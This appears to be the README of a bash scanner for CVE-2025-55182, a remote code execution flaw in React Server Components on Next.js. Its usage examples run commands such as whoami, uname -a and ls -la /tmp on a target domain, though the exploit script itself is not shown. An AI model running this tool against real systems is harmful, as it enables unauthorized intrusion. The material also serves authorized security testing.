Share
## https://sploitus.com/exploit?id=FCC7ECD7-4FC8-56A9-A464-DE87442997C8
# CVE-2025-55182 Scanner

Simple command-line tool for detecting and exploiting CVE-2025-55182 (React Server Components RCE) in Next.js applications.


## Installation

```bash
chmod +x scanner.sh
```

## Usage

```bash
# Scan with default command (id)
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d example.com -c "whoami"

# With full URL
./scanner.sh -d https://example.com -c "uname -a"
```

## Options

- `-d, --domain` - Target domain/URL (required)
- `-c, --command` - Command to execute (default: `id`)

## Examples

```bash
# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com

# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"

# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
```

## Requirements

- Bash
- curl
- openssl

## Disclaimer

This tool is for **educational and authorized security testing purposes only**. Do not use against systems you don't own or have permission to test.

## References

- [CVE-2025-55182](https://cloud.projectdiscovery.io/library/CVE-2025-55182)
- [React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)